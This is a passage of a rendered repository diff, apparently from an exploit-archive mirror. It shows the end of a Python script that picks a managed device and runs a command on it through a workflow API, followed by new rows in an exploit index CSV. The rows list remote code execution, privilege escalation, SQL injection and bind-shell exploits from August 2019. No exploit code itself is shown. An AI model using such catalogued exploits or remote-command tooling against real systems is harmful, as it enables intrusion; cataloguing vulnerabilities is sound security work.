counter = 1
|
||||||
|
for key in devices.keys():
|
||||||
|
print(f" {counter}: {key} ({devices[key][0]}) ({devices[key][1]})")
|
||||||
|
|
||||||
|
print("")
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: "
|
||||||
|
devSelect = int(input(prompt))
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
sys.exit(1)
|
||||||
|
except ValueError:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
if devSelect < 1 or devSelect > len(list(devices.keys())):
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
else:
|
||||||
|
device = list(devices.keys())[counter - 1]
|
||||||
|
break
|
||||||
|
|
||||||
|
# don't hate, it works doesn't it?
|
||||||
|
if "indows" in devices[device][1]:
|
||||||
|
workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c)
|
||||||
|
else:
|
||||||
|
workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c)
|
||||||
|
|
||||||
|
workflowID = getWorkflowID(args.t, session, apiKey, workflowName)
|
||||||
|
runWorkflow(args.t, session, apiKey, workflowID, device)
|
||||||
|
|
||||||
|
|
||||||
|
main()
|
|
@ -6525,6 +6525,8 @@ id,file,description,date,author,type,platform,port
|
||||||
47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
|
47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
|
||||||
47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
|
47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
|
||||||
47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
|
47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
|
||||||
|
47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows,
|
||||||
|
47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -10632,6 +10634,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
|
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
|
||||||
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
|
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
|
||||||
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
|
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
|
||||||
|
47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -17606,6 +17609,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
|
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
|
||||||
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
|
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
|
||||||
47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
|
47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
|
||||||
|
47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -41606,3 +41610,11 @@ id,file,description,date,author,type,platform,port
|
||||||
47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
|
47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
|
||||||
47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
|
47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
|
||||||
47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
|
47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
|
||||||
|
47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80
|
||||||
|
47235,exploits/php/webapps/47235.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell",2019-08-12,xerubus,webapps,php,
|
||||||
|
47247,exploits/php/webapps/47247.txt,"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting",2019-08-14,"Ilca Lucian Florin",webapps,php,80
|
||||||
|
47249,exploits/php/webapps/47249.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection",2019-08-14,qw3rTyTy,webapps,php,80
|
||||||
|
47250,exploits/hardware/webapps/47250.rb,"D-Link DIR-600M - Authentication Bypass (Metasploit)",2019-08-14,"Devendra Singh Solanki",webapps,hardware,80
|
||||||
|
47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
|
||||||
|
47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
|
||||||
|
47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue